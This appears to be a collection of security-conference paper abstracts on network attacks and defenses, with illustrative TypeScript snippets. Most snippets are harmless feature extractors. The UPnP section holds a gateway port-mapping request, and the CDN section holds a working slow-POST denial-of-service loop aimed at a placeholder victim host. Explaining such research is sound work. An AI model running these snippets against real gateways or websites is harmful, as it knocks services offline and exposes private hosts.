Software-defined networking (SDN) achieves a programmable control plane through the use of logically centralized, event-driven controllers and through network applications (apps) that extend the controllers’ functionality. As control plane decisions are often based on the data plane, it is possible for carefully-crafted malicious data plane inputs to direct the control plane towards unwanted states that bypass network security restrictions (i.e., cross-plane attacks). Unfortunately, due to the complex interplay between controllers, apps, and data plane inputs, at present it is difficult to systematically identify and analyze these cross-plane vulnerabilities.

We present EventScope, a vulnerability detection tool that automatically analyzes SDN control plane event usage, discovers candidate vulnerabilities based on missing event handling routines, and validates vulnerabilities based on data plane effects. To accurately detect missing event handlers without ground truth or developer aid, we cluster apps according to similar event usage and mark inconsistencies as candidates. We create an event flow graph to observe a global view of events and control flows within the control plane and use it to validate vulnerabilities that affect the data plane. We applied EventScope to the ONOS SDN controller and uncovered 14 new vulnerabilities.

SVLAN: Secure & Scalable Network Virtualization

Network isolation is a critical modern Internet service. To date, network operators have created a logical network of distributed systems to provide communication isolation between different parties. However, the current network isolation is limited in scalability and flexibility. It limits the number of virtual networks and it only supports isolation at host (or virtual-machine) granularity. In this paper, we introduce Scalable Virtual Local Area Networking (SVLAN) that scales to a large number of distributed systems and offers improved flexibility in providing secure network isolation. With the notion of destination-driven reachability and packet-carrying forwarding state, SVLAN not only offers communication isolation but isolation can be specified at different granularities, e.g., per-application or per-process. Our proof-of-concept SVLAN implementation demonstrates its feasibility and practicality for real-world applications.

Session 5A: Network Crime and Privacy

A Practical Approach for Taking Down Avalanche Botnets Under Real-World Constraints

In 2016, law enforcement dismantled the infrastructure of the Avalanche bulletproof hosting service, the largest takedown of a cybercrime operation so far. The malware families supported by Avalanche use Domain Generation Algorithms (DGAs) to generate random domain names for controlling their botnets. The takedown proactively targets these presumably malicious domains; however, as coincidental collisions with legitimate domains are possible, investigators must first classify domains to prevent undesirable harm to website owners and botnet victims.

The constraints of this real-world takedown (proactive decisions without access to malware activity, no bulk patterns and no active connections to domains) mean that approaches from the state of the art cannot be applied. The problem of classifying thousands of registered DGA domain names therefore required an extensive, painstaking manual effort by law enforcement investigators. To significantly reduce this effort without compromising correctness, we develop a model that automates the classification. We achieve an accuracy of 95.8% on the ground truth of the 2017 Avalanche takedown, which translates into a reduction of up to 94.0% in manual investigation effort. Furthermore, we interpret the model to provide investigators with insights into how benign and malicious domains differ in behavior, which features and data sources are most important, and how the model can be configured according to the practical requirements of a real-world takedown.
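
To make the classification setting concrete, here are the kinds of lightweight lexical features such a model can start from; the paper's actual feature set is richer and tailored to the takedown's constraints (no malware activity, no bulk patterns, no active connections to domains), so treat this purely as a toy:

```ts
// Toy lexical features that separate many DGA-generated labels from
// benign ones: length, character entropy, and digit ratio.
function domainFeatures(domain: string) {
  const label = domain.split(".")[0];
  const counts = new Map<string, number>();
  for (const c of label) counts.set(c, (counts.get(c) ?? 0) + 1);
  let entropy = 0;
  for (const n of counts.values()) {
    const p = n / label.length;
    entropy -= p * Math.log2(p);
  }
  const digits = [...label].filter((c) => c >= "0" && c <= "9").length;
  return { length: label.length, entropy, digitRatio: digits / label.length };
}

console.log(domainFeatures("x3k9q7zam2.example")); // high entropy, digits
console.log(domainFeatures("wikipedia.example"));  // low entropy, no digits
```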

Designing a Better Browser for Tor with BLAST

Tor is an anonymity network that allows clients to browse web pages privately, but loading web pages with Tor is slow. To analyze how the browser loads web pages, we examine their resource trees using our new browser logging and simulation tool, BLAST. We find that the time it takes to load a web page with Tor is almost entirely determined by the number of round trips incurred, not its bandwidth, and Tor Browser incurs unnecessary round trips. Resources sit in the browser queue excessively waiting for the TCP, TLS or ALPN handshakes, each of which takes a separate round trip. We show that increasing resource loading capacity with larger pipelines and even HTTP/2 do not decrease load time because they do not save round trips.

We set out to minimize round trips with a number of protocol and browser improvements, including TCP Fast Open, optimistic data, and zero-RTT TLS. We also recommend the use of databases to assist the client with redirection, identifying HTTP/2 servers, and prefetching. All of these features are designed to cut down on the number of round trips incurred in loading web pages. To evaluate these proposed improvements, we create a simulation tool and validate that it is highly accurate in predicting mean page load times. We use the simulator to analyze these features and it predicts that they will decrease the mean page load time by 61% in total over HTTP/2. Our large improvement to user experience comes at trivial cost to the Tor network.

Encrypted DNS => Privacy? A Traffic Analysis Perspective

Virtually every connection to an Internet service is preceded by a DNS lookup, which is performed without any traffic-level protection, thus enabling manipulation, redirection, surveillance, and censorship. To address these issues, large organizations such as Google and Cloudflare are deploying recently standardized protocols that encrypt DNS traffic between end users and recursive resolvers: DNS-over-TLS (DoT) and DNS-over-HTTPS (DoH). In this paper, we examine whether encrypting DNS traffic can protect users from traffic analysis-based monitoring and censoring. We propose a novel feature set to perform the attacks, as those used to attack HTTPS or Tor traffic are not suited to DNS' characteristics. We show that traffic analysis enables the identification of domains with high accuracy in closed- and open-world settings, using 124 times less data than attacks on HTTPS flows. We find that factors such as location, resolver, platform, or client do degrade the attacks' performance, but they are far from completely stopping them. Our results indicate that DNS-based censorship is still possible on encrypted DNS traffic. In fact, we demonstrate that the standardized padding schemes are not effective. Yet Tor, which does not effectively mitigate traffic analysis attacks on web traffic, is a good defense against DoH traffic analysis.
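
The features driving such attacks are simple to state: the ordered sequence of TLS record sizes, signed by direction, carries enough structure (resolution-chain bursts, cached vs. uncached answers) to identify domains. A toy extraction with made-up trace values:

```ts
// A captured DoH connection reduced to (direction, size) pairs per TLS record.
const trace: Array<{ dir: "out" | "in"; bytes: number }> = [
  { dir: "out", bytes: 97 },  { dir: "in", bytes: 129 },
  { dir: "out", bytes: 101 }, { dir: "in", bytes: 482 },
  { dir: "out", bytes: 99 },  { dir: "in", bytes: 255 },
];

// Signed sizes: positive = client->resolver, negative = resolver->client.
const sizes = trace.map((r) => (r.dir === "out" ? r.bytes : -r.bytes));

// N-grams of signed sizes make convenient classifier features.
const bigrams = sizes.slice(1).map((v, i) => `${sizes[i]},${v}`);

console.log(sizes);   // [97, -129, 101, -482, 99, -255]
console.log(bigrams); // ["97,-129", "-129,101", ...]
```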

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways

Typical port scanning approaches do not achieve a full coverage of all devices connected to the Internet as not all devices are directly reachable via a public (IPv4) address: due to IP address space exhaustion, firewalls, and many other reasons, an end-to-end connectivity is not achieved in today’s Internet anymore. Especially Network Address Translation (NAT) is widely deployed in practice and it has the side effect of “hiding” devices from being scanned. Some protocols, however, require end-to-end connectivity to function properly and hence several methods were developed in the past to enable crossing network borders.

In this paper, we explore how an attacker can take advantage of such application-layer middlebox protocols to access devices hidden behind these gateways. More specifically, we investigate different methods for identifying such devices by (ab)using legitimate protocol features. We categorize the available protocols into two classes: First, there are persistent protocols that are typically port-forwarding based. Such protocols are used to allow local network devices to open and forward external ports to them. Second, there are non-persistent protocols that are typically proxy-based and route packets between network edges, such as HTTP and SOCKS proxies. We perform a comprehensive, Internet-wide analysis to obtain an accurate overview of how prevalent and widespread such protocols are in practice. Our results indicate that hundreds of thousands of hosts are vulnerable to different types of attacks; e.g., we detect over 400,000 hosts that are likely vulnerable to attacks involving the UPnP IGD protocol. More worrisome, we find empirical evidence that attackers are already actively exploiting such protocols in the wild to access devices located behind NAT gateways. Among other findings, we discover that at least 24% of all open Internet proxies are misconfigured to allow accessing hosts on non-routable addresses.
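
For a sense of how little the "persistent" class requires, here is a sketch of the standard UPnP IGD AddPortMapping call such attacks build on: an unauthenticated SOAP request asking the gateway to forward an external port to an internal host. The control URL and port are placeholders (they are normally learned via SSDP discovery first); only test devices you own:

```ts
const soapBody = `<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
            s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>8080</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.168.1.50</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>test</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:AddPortMapping>
  </s:Body>
</s:Envelope>`;

// Placeholder control URL; requires Node 18+ for the global fetch.
fetch("http://192.0.2.1:5000/ctl/IPConn", {
  method: "POST",
  headers: {
    "Content-Type": 'text/xml; charset="utf-8"',
    SOAPAction: '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"',
  },
  body: soapBody,
}).then((r) => console.log("gateway answered:", r.status));
```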

Session 6A: Network Defenses

Hold the Door! Fingerprinting Your Car Key to Prevent Keyless Entry Car Theft

Recently, the traditional way to unlock car doors has been replaced with keyless entry systems, which prove more convenient for automobile owners. When a driver with a key fob is in the vicinity of the vehicle, the doors automatically unlock on user command. Unfortunately, however, these keyless entry systems are known to be vulnerable to signal-relaying attacks. While it is evident that automobile manufacturers incorporate preventative methods to secure these keyless entry systems, a range of attacks continue to occur. Relayed signals fit into the valid packets that are verified as legitimate, and this makes it difficult to distinguish a legitimate unlock request from malicious signals. In response to this vulnerability, this paper presents an RF fingerprinting method (coined "HOld the DOoR", HODOR) to detect attacks on keyless entry systems, which is the first attempt to exploit RF fingerprinting in the automotive domain. HODOR is designed as a sub-authentication system that supports existing keyless entry authentication systems and does not require any modification of the main system. Through a series of experiments, the results demonstrate that HODOR competently and reliably detects attacks on keyless entry systems. HODOR achieves both an average false positive rate (FPR) of 0.27% and a false negative rate (FNR) of 0% for the detection of simulated attacks corresponding to the current wave of keyless entry car theft. Furthermore, HODOR was also evaluated under environmental factors: temperature variation, non-line-of-sight (NLoS) conditions, and battery aging. HODOR yields a false positive rate of 1.32% for the identification of a legitimate key fob even under NLoS conditions. Based on these experimental results, it is expected that HODOR will provide a secure service for keyless entry systems while remaining convenient.

Poseidon: Mitigating Volumetric DDoS Attacks with Programmable Switches

Distributed Denial-of-Service (DDoS) attacks have become a critical threat to the Internet. Due to the increasing number of vulnerable Internet of Things (IoT) devices, attackers can easily compromise a large set of nodes to form botnets and launch high-volume DDoS attacks. State-of-the-art DDoS defenses, however, have not caught up with the fast evolution of the attacks and the requirements of latency-sensitive services in data centers, as most existing defense systems are high in cost and low in agility. In this paper, we propose POSEIDON, a framework that is designed to address those key limitations in today's DDoS defenses, leveraging emerging programmable switches that can be reconfigured in the field without additional hardware cost. In designing POSEIDON, we address three key challenges in terms of intent expression, resource orchestration, and runtime management. Evaluations using our prototype demonstrate that POSEIDON can potentially defend against ~Tbps attack traffic, simplify the expression of defense intents to tens of lines of code, accommodate policy changes in seconds, and adapt to dynamic attacks with negligible overhead. Moreover, compared with the state of the art, POSEIDON reduces the defense costs and the end-to-end packet processing latency by two orders of magnitude, making it a promising defense against modern advanced DDoS attacks.

EASI: Edge-Based Sender Identification on Resource-Constrained Platforms for Automotive Networks

In vehicles, internal Electronic Control Units (ECUs) are increasingly prone to adversarial exploitation over wireless connections due to ongoing digitalization. Controlling an ECU allows an adversary to send messages to the internal vehicle bus and thereby to control various vehicle functions. Access to the Controller Area Network (CAN), the most widely used bus technology, is especially severe, as it controls brakes and steering. However, state-of-the-art receivers are not able to identify the sender of a frame. Retrofitting frame authenticity, e.g. through Message Authentication Codes (MACs), is only possible to a limited extent due to reduced bandwidth, low payload, and limited computational resources. To address this problem, observing analog differences in the CAN signal has been proposed to determine the actual sender. These prior approaches, which exhibit good identification rates in some cases, require high sample rates and high computational effort. With EASI we significantly reduce the required resources and at the same time show increased identification rates of 99.98%, with no false positives, in a prototype structure and two series production vehicles. In comparison to the most lightweight approach so far, we have reduced the memory footprint and the computational requirements by factors of 168 and 142, respectively. In addition, we show the feasibility of EASI, and thus for the first time that sender identification using comprehensive signal characteristics is realizable on resource-constrained platforms. Due to the lightweight design, we achieve classification in under 100 µs with a training time of 2.61 seconds. We also show the ability to adapt the system to incremental changes during operation. Since cost effectiveness is of utmost importance in the automotive industry due to high production volumes, the achieved improvements are significant and necessary to realize sender identification.

BLAG: Improving the Accuracy of Blacklists

IP address blacklists are a useful source of information about repeat attackers. Such information can be used to prioritize which traffic to divert for deeper inspection (e.g., repeat offender traffic), or which traffic to serve first (e.g., traffic from sources that are not blacklisted). But blacklists also suffer from overspecialization – each list is geared towards a specific purpose – and they may be inaccurate due to misclassification or stale information. We propose BLAG, a system that evaluates and aggregates multiple blacklist feeds, producing a more useful, accurate, and timely master blacklist tailored to the specific customer network. BLAG uses a sample of the legitimate sources of the customer network's inbound traffic to evaluate the accuracy of each blacklist over regions of address space. It then leverages recommendation systems to select the most accurate information to aggregate into its master blacklist. Finally, BLAG identifies portions of the master blacklist that can be expanded into larger address regions (e.g., /24 prefixes) to uncover more malicious addresses with minimum collateral damage. Our evaluation of 157 blacklists of various attack types and three ground-truth datasets shows that BLAG achieves high specificity of up to 99%, improves recall by up to 114 times compared to competing approaches, and detects attacks up to 13.7 days faster, which makes it a promising approach for blacklist generation.
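
A toy version of the per-region accuracy idea is sketched below. BLAG itself fills in missing scores with a recommendation system (matrix factorization); this sketch just uses direct counts of misclassified known-legitimate addresses per /24, so every threshold and value here is illustrative:

```ts
type Blacklist = { name: string; addrs: string[] };

const slash24 = (ip: string) => ip.split(".").slice(0, 3).join(".") + ".0/24";

// Keep an address only if its list is regionally accurate: the list's
// entries in that /24 rarely collide with known-legitimate sources.
function aggregate(lists: Blacklist[], knownLegit: Set<string>): Set<string> {
  const master = new Set<string>();
  for (const list of lists) {
    const region = new Map<string, { bad: number; total: number }>();
    for (const ip of list.addrs) {
      const r = slash24(ip);
      const c = region.get(r) ?? { bad: 0, total: 0 };
      c.total++;
      if (knownLegit.has(ip)) c.bad++; // legit address on a blacklist
      region.set(r, c);
    }
    for (const ip of list.addrs) {
      const c = region.get(slash24(ip))!;
      if (c.bad / c.total < 0.1) master.add(ip); // accurate regions only
    }
  }
  return master;
}

const legit = new Set(["198.51.100.7"]);
const feeds: Blacklist[] = [
  { name: "feedA", addrs: ["198.51.100.7", "203.0.113.5", "203.0.113.9"] },
];
console.log(aggregate(feeds, legit)); // keeps 203.0.113.x, drops legit region
```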

DefRec: Establishing Physical Function Virtualization to Disrupt Reconnaissance of Power Grids’ Cyber-Physical Infrastructures

Reconnaissance is critical for adversaries to prepare attacks causing physical damage in industrial control systems (ICS) like smart power grids. Disrupting the reconnaissance is challenging. The state-of-the-art moving target defense (MTD) techniques based on mimicking and simulating system behaviors do not consider the physical infrastructure of power grids and can be easily identified.

To overcome those challenges, we propose physical function virtualization (PFV), which "hooks" network interactions with real physical devices and uses them to build lightweight virtual nodes that follow the actual implementation of network stacks, system invariants, and physical state variations of real devices. On top of PFV, we propose DefRec, a defense mechanism that significantly increases the reconnaissance effort required for adversaries to obtain knowledge of power grids' cyber-physical infrastructures. By randomizing communications and crafting decoy data for the virtual physical nodes, DefRec can mislead adversaries into designing damage-free attacks. We implement PFV and DefRec in the ONOS network operating system and evaluate them in a cyber-physical testbed, which uses real devices from different vendors and HP physical switches to simulate six power grids. The experiment results show that, with negligible overhead, PFV can accurately follow the behavior of real devices. DefRec can significantly delay passive attacks for at least five months and isolate proactive attacks with a false negative rate of less than 10^-30.

Session 7A: Network Attacks

Withdrawing the BGP Re-Routing Curtain: Understanding the Security Impact of BGP Poisoning through Real-World Measurements

The security of the Internet’s routing infrastructure has underpinned much of the past two decades of distributed systems security research. However, the converse is increasingly true. Routing and path decisions are now important for the security properties of systems built on top of the Internet. In particular, BGP poisoning leverages the de facto routing protocol between Autonomous Systems (ASes) to maneuver the return paths of upstream networks onto previously unusable, new paths. These new paths can be used to avoid congestion, censors, geo-political boundaries, or any feature of the topology which can be expressed at an AS-level. Given the increase in use of BGP poisoning as a security primitive for security systems, we set out to evaluate the feasibility of poisoning in practice, going beyond simulation.

To that end, using a multi-country and multi-router Internet-scale measurement infrastructure, we capture and analyze over 1,400 instances of BGP poisoning across thousands of ASes as a mechanism to maneuver the return paths of traffic. We analyze in detail the performance of steering paths, the graph-theoretic aspects of available paths, and re-evaluate simulated systems with this data. We find that the real-world evidence does not completely support the findings from simulated systems published in the literature. We also analyze the filtering of BGP poisoning across types of ASes and ISP working groups. We explore the connectivity concerns when poisoning by reproducing a decade-old experiment to uncover the current state of an Internet triple the size. We build predictive models for understanding an AS's vulnerability to poisoning. Finally, an exhaustive measurement of an upper bound on the maximum path length of the Internet is presented, detailing how recent and future security research should react to ASes leveraging poisoning with long paths. In total, our results and analysis attempt to expose the real-world impact of BGP poisoning on past and future security research.

IMP4GT: IMPersonation Attacks in 4G NeTworks

Long Term Evolution (LTE/4G) establishes mutual authentication with a provably secure Authentication and Key Agreement protocol on layer three of the network stack. Permanent integrity protection of the control plane safeguards the traffic against manipulations. However, missing integrity protection of the user plane still allows an adversary to manipulate and redirect IP packets, as recently demonstrated.

In this work, we introduce a novel cross-layer attack that exploits the existing vulnerability on layer two and extends it with an attack mechanism on layer three. More precisely, we take advantage of the default IP stack behavior of operating systems, which allows an active attacker to impersonate a user towards the network and vice versa; we name these attacks IMP4GT (IMPersonation attacks in 4G neTworks). In contrast to the simple redirection attack demonstrated in prior work, our attack dramatically extends the possible attack scenarios and thus emphasizes the need for user plane integrity protection in mobile communication standards. The results of our work imply that providers can no longer rely on mutual authentication for billing, access control, and legal prosecution. On the other hand, users are exposed to any incoming IP connection, as an adversary can bypass the provider's firewall. To demonstrate the practical impact of our attack, we conduct two IMP4GT attack variants in a commercial network, which, for the first time, completely break the mutual authentication aim of LTE on the user plane in a real-world setting.

Practical Traffic Analysis Attacks on Secure Messaging Applications

Instant Messaging (IM) applications like Telegram, Signal, and WhatsApp have become extremely popular in recent years. Unfortunately, such IM services have been the target of continuous governmental surveillance and censorship, as these services are home to public and private communication channels on socially and politically sensitive topics. To protect their clients, popular IM services deploy state-of-the-art encryption mechanisms. In this paper, we show that despite the use of advanced encryption, popular IM applications leak sensitive information about their clients to adversaries who merely monitor their encrypted IM traffic, with no need to leverage any software vulnerabilities of IM applications. Specifically, we devise traffic analysis attacks that enable an adversary to identify administrators as well as members of target IM channels (e.g., forums) with high accuracy. We believe that our study demonstrates a significant, real-world threat to the users of such services, given the increasing attempts by oppressive governments to crack down on controversial IM channels.

We demonstrate the practicality of our traffic analysis attacks through extensive experiments on real-world IM communications. We show that standard countermeasure techniques such as adding cover traffic can degrade the effectiveness of the attacks we introduce in this paper. We hope that our study urges IM providers to integrate effective traffic obfuscation countermeasures into their software. In the meantime, we have designed and deployed an open-source, publicly available countermeasure system, called IMProxy, that can be used by IM clients with no need for any support from IM providers. We have demonstrated the effectiveness of IMProxy through experiments.

CDN Judo: Breaking the CDN DoS Protection with Itself

Content Delivery Networks (CDNs) improve websites' access performance and availability with their globally distributed network infrastructure, which has contributed to the flourishing of CDN-powered websites on the Internet. As CDN-powered websites normally operate important businesses or critical services, attackers are most interested in taking down these high-value websites, achieving severe damage with maximum influence. Since the CDN absorbs distributed attack traffic with its massive bandwidth resources, CDN vendors have always claimed that they provide effective DoS protection for the CDN-powered websites.

However, we reveal that implementation or protocol weaknesses in the CDN's forwarding mechanism can be exploited to break the CDN protection. By sending crafted but legal requests, an attacker can launch an efficient DoS attack against the website's Origin behind it. In particular, we present three CDN threats in this study. By abusing the CDN's HTTP/2 request-converting behavior and HTTP pre-POST behavior, an attacker can saturate the CDN-Origin bandwidth and exhaust the Origin's connection limits. Even more concerning, some CDN vendors use only a small set of traffic-forwarding IPs with a low IP-churning rate to establish connections with the Origin. This characteristic provides a great opportunity for an attacker to effectively degrade the website's global availability by simply cutting off specific CDN-Origin connections.

In this work, we examine the CDN's request-forwarding behavior across six well-known CDN vendors, and we perform real-world experiments to evaluate the severity of the threats. As the threats are caused by CDN vendors' poor trade-offs between usability and security, we discuss possible mitigations, and we have received positive feedback after responsibly disclosing the issues to the affected CDN vendors.
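
To make the pre-POST issue concrete, this is roughly what the abused client behavior looks like at the socket level: headers announce a large body that then arrives one byte at a time, pinning a pre-established CDN-to-Origin connection per client connection. Hostnames are placeholders; never aim this at infrastructure you do not control:

```ts
import * as net from "node:net";

function slowPost(cdnEdge: string, originHost: string): void {
  const sock = net.connect({ host: cdnEdge, port: 80 }, () => {
    sock.write(
      "POST /upload HTTP/1.1\r\n" +
        `Host: ${originHost}\r\n` +
        "Content-Length: 10000000\r\n" +
        "\r\n"
    );
    // Trickle the body: one byte every 10 seconds keeps the CDN's
    // pre-established Origin connection occupied almost indefinitely.
    setInterval(() => sock.write("A"), 10_000);
  });
  sock.on("error", () => sock.destroy());
}

for (let i = 0; i < 100; i++) slowPost("cdn-edge.example", "victim.example");
```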

Session 9B: Authentication

OcuLock: Exploring Human Visual System for Authentication in Virtual Reality Head-mounted Display

The increasing popularity of virtual reality (VR) in a wide spectrum of applications has generated sensitive personal data such as medical records and credit card information. While protecting such data from unauthorized access is critical, directly applying traditional authentication methods (e.g., PIN) through new VR input modalities such as remote controllers and head navigation would cause security issues. The authentication action can be purposefully observed by attackers to infer the authentication input. Unlike any other mobile device, VR presents an immersive experience via a head-mounted display (HMD) that fully covers users' eye area without public exposure. Leveraging this feature, we explore the human visual system (HVS) as a novel biometric authentication tailored for VR platforms. While previous works used eye globe movement (gaze) to authenticate on smartphones or PCs, they suffer from high error rates and low stability since eye gaze is highly dependent on cognitive state. In this paper, we explore the HVS as a whole, considering not just the eye globe movement but also the eyelid, extraocular muscles, cells, and surrounding nerves of the HVS. Exploring the HVS biostructure and unique HVS features triggered by immersive VR content can enhance authentication stability. To this end, we present OcuLock, an HVS-based system for reliable and unobservable VR HMD authentication. OcuLock is empowered by an electrooculography (EOG) based HVS sensing framework and a record-comparison driven authentication scheme. Experiments with 70 subjects show that OcuLock is resistant against common types of attacks such as impersonation attacks and statistical attacks, with Equal Error Rates as low as 3.55% and 4.97%, respectively. More importantly, OcuLock maintains stable performance over a 2-month period and is preferred by users when compared to other potential approaches.

On the Resilience of Biometric Authentication Systems against Random Inputs

We assess the security of machine learning based biometric authentication systems against an attacker who submits uniform random inputs, either as feature vectors or raw inputs, in order to find an accepting sample of a target user. The average false positive rate (FPR) of the system, i.e., the rate at which an impostor is incorrectly accepted as the legitimate user, may be interpreted as a measure of the success probability of such an attack. However, we show that the success rate is often higher than the FPR. In particular, for one reconstructed biometric system with an average FPR of 0.03, the success rate was as high as 0.78. This has implications for the security of the system, as an attacker with only the knowledge of the length of the feature space can impersonate the user with less than 2 attempts on average. We provide a detailed analysis of why the attack is successful, and validate our results using four different biometric modalities and four different machine learning classifiers. Finally, we propose mitigation techniques that render such attacks ineffective, with little to no effect on the accuracy of the system.
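
The effect has a simple geometric intuition that a toy experiment can reproduce: in higher dimensions, uniform random vectors concentrate (for instance, the mean of their coordinates clusters around 0.5), so any acceptance region sitting on that concentration mass gets hit by random probes far more often than a nominal FPR would suggest. The "model" below is a made-up stand-in, not one of the paper's classifiers:

```ts
// Made-up acceptance rule standing in for a trained classifier: accept a
// 32-dimensional sample if its coordinate mean lies in a narrow band.
const dim = 32;

function accepts(v: number[]): boolean {
  const m = v.reduce((a, b) => a + b, 0) / v.length;
  return m > 0.45 && m < 0.55;
}

// Uniform random probes: by concentration of measure, their coordinate
// mean lands in [0.45, 0.55] most of the time, so the attack succeeds far
// more often than an FPR measured on realistic impostor samples implies.
let hits = 0;
const trials = 10_000;
for (let t = 0; t < trials; t++) {
  const v = Array.from({ length: dim }, () => Math.random());
  if (accepts(v)) hits++;
}
console.log(`random-input acceptance rate: ${(hits / trials).toFixed(3)}`); // ~0.67
```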

Strong Authentication without Tamper-Resistant Hardware and Application to Federated Identities

Shared credentials are currently the most widespread form of end-user authentication due to their convenience, but they are also criticized for being vulnerable to credential database theft and phishing attacks. While several alternative mechanisms have been proposed to offer strong authentication with cryptographic challenge-response protocols, they are cumbersome to use due to the need for tamper-resistant hardware modules at the user end. In this paper, we propose the first strong authentication mechanism without reliance on tamper-resistant hardware at the user end. A user authenticates with a password-based credential by generating designated-verifiable authentication tokens. Our scheme is resistant to offline dictionary attacks even if the attacker steals the password-protected credentials, and it can thus be implemented on general-purpose devices.
More specifically, we first introduce and formalize the notion of Password-Based Credential (PBC), which models the resistance to offline attacks and the unforgeability of authentication tokens even if attackers can see authentication tokens and capture the password-wrapped credentials of honest users. We then present a highly efficient construction of PBC using a "randomize-then-prove" approach, and prove its security. The construction does not involve bilinear pairings and can be implemented with common cryptographic libraries on many platforms. We also present a technique to transform the PBC scheme into a publicly verifiable one, and present an application of PBC in federated identity systems to provide holder-of-key assertion mechanisms. Compared with current certificate-based approaches, it is more convenient and user-friendly, and can be used with federation systems that employ privacy-preserving measures (e.g., Sign-in with Apple). We also implement the PBC scheme and evaluate its performance for different applications over various network environments. When PBC is used as a strong authentication mechanism for end users, it saves 26%-36% of the time taken by an ECDSA-based approach with a tamper-resistant hardware module. As for its application in federation, it saves even more time when the user proves possession of the key to a Relying Party.

Session 10A: Case Studies & Human Factors

A View from the Cockpit: Exploring Pilot Reactions to Attacks on Avionic Systems

Many wireless communications systems found in aircraft lack standard security mechanisms, leaving them fundamentally vulnerable to attack. With affordable software-defined radios available, a novel threat has emerged, allowing a wide range of attackers to easily interfere with wireless avionic systems. Whilst these vulnerabilities are known, concrete attacks that exploit them are still novel and not yet well understood. This is true in particular with regard to their kinetic impact on the handling of the attacked aircraft and consequently its safety. To investigate this, we invited 30 Airbus A320 type-rated pilots to fly simulator scenarios in which they were subjected to attacks on their avionics. We implement and analyze novel wireless attacks on three safety-related systems: the Traffic Collision Avoidance System (TCAS), the Ground Proximity Warning System (GPWS), and the Instrument Landing System (ILS). We found that all three analyzed attack scenarios created significant control impact and cost of disruption through turnarounds, avoidance manoeuvres, and diversions. They further increased workload, distrust in the affected system, and in 38% of cases caused the attacked safety system to be switched off entirely. All pilots felt the scenarios were useful, with 93.3% feeling that specific simulator training for wireless attacks could be valuable.

Genotype Extraction and False Relative Attacks: Security Risks to Third-Party Genetic Genealogy Services Beyond Identity Inference

Here, we evaluate the security of a consumer-facing, third-party genetic analysis service, called GEDmatch, that specializes in genetic genealogy: a field that uses genetic data to identify relatives. GEDmatch is one of the most prominent third-party genetic genealogy services due to its size (over 1 million genetic data files) and the large role it now plays in criminal investigations. In this work, we focus on security risks particular to genetic genealogy, namely relative matching queries – the algorithms used to identify genetic relatives – and the resulting relative predictions. We experimentally demonstrate that GEDmatch is vulnerable to a number of attacks by an adversary that only uploads normally formatted genetic data files and runs relative matching queries. Using a small number of specifically designed files and queries, an attacker can extract a large percentage of the genetic markers from other users; 92% of markers can be extracted with 98% accuracy, including hundreds of medically sensitive markers. We also find that an adversary can construct genetic data files that falsely appear to be relatives of other samples in the database; in certain situations, these false relatives can be used to make the de-identification of genetic data more difficult. These vulnerabilities exist because of particular design choices meant to improve functionality. However, our results show how security and the goals of genetic genealogy can come into conflict. We conclude with a discussion of the broader impact of these results on the entire consumer genetic testing community and provide recommendations for genetic genealogy services.

Complex Security Policy? A Longitudinal Analysis of Deployed Content Security Policies

The Content Security Policy (CSP) mechanism was developed as a mitigation against script injection attacks in 2010. In this paper, we leverage the unique vantage point of the Internet Archive to conduct a historical and longitudinal analysis of how CSP deployment has evolved for a set of 10,000 highly ranked domains. In doing so, we document the long-term struggle site operators face when trying to roll out CSP for content restriction, and highlight that even seemingly secure whitelists can be bypassed through expired or typo domains. Next to these new insights, we also shed light on the usage of CSP for other use cases, in particular TLS enforcement and framing control. Here, we find that CSP can be easily deployed to fit those security scenarios, but both lack widespread adoption. Specifically, while the underspecified and thus inconsistently implemented X-Frame-Options header is increasingly used on the Web, CSP's well-specified and secure alternative cannot keep up. To understand the reasons behind this, we run a notification campaign and subsequent survey, concluding that operators have often experienced the complexity of CSP (and given up), utterly unaware of the easy-to-deploy components of CSP. Hence, we find that the complexity of secure, yet functional content restriction gives CSP a bad reputation, resulting in operators not leveraging its potential to secure a site against attack vectors beyond the original script-injection one.
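
The "easy-to-deploy components" the survey found operators to be unaware of require no whitelist curation at all. A sketch of serving them from a plain Node server (the directive values are standard CSP; the server itself is just a stub):

```ts
import * as http from "node:http";

http
  .createServer((req, res) => {
    // Framing control (the well-specified replacement for X-Frame-Options)
    // plus TLS enforcement, with no script whitelist to maintain:
    res.setHeader(
      "Content-Security-Policy",
      "frame-ancestors 'self'; upgrade-insecure-requests"
    );
    res.end("ok");
  })
  .listen(8080);
```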

Into the Deep Web: Understanding E-commerce Fraud from Autonomous Chat with Cybercriminals

E-commerce miscreants rely heavily on instant messaging (IM) to promote their illicit businesses and coordinate their operations. The threat intelligence provided by IM communication therefore becomes invaluable for understanding and mitigating the threats of e-commerce fraud. However, such information is hard to get, since it is usually shared only through one-on-one conversations with the criminals. In this paper, we present the first chatbot, called Aubrey, to actively collect such intelligence through autonomous chats with real-world e-commerce miscreants. Our approach leverages the question-driven conversation pattern of small-time workers, who seek jobs and/or attack resources from e-commerce fraudsters, to model the interaction process as a finite state machine, thereby enabling autonomous conversation. Aubrey successfully chatted with 470 real-world e-commerce miscreants and gathered a large amount of fraud-related artifacts, including 40 SIM gateways, 323K fraud phone numbers, and previously unknown attack toolkits. Further, the conversations reveal the supply chain of e-commerce fraud activities on the deep web and the complicated relations (e.g., complicity and reselling) among miscreant roles.

Compliance Cautions: Investigating Security Issues Associated with U.S. Digital-Security Standards

Digital security compliance programs and policies serve as powerful tools for protecting organizations’ intellectual property, sensitive resources, customers, and employees through mandated security controls. Organizations place a significant emphasis on compliance and often conflate high compliance audit scores with strong security; however, no compliance standard has been systemically evaluated for security concerns that may exist even within fully-compliant organizations. In this study, we describe our approach for auditing three exemplar compliance standards that affect nearly every person within the United States: standards for federal tax information, credit card transactions, and the electric grid. We partner with organizations that use these standards to validate our findings within enterprise environments and provide first-hand narratives describing impact.

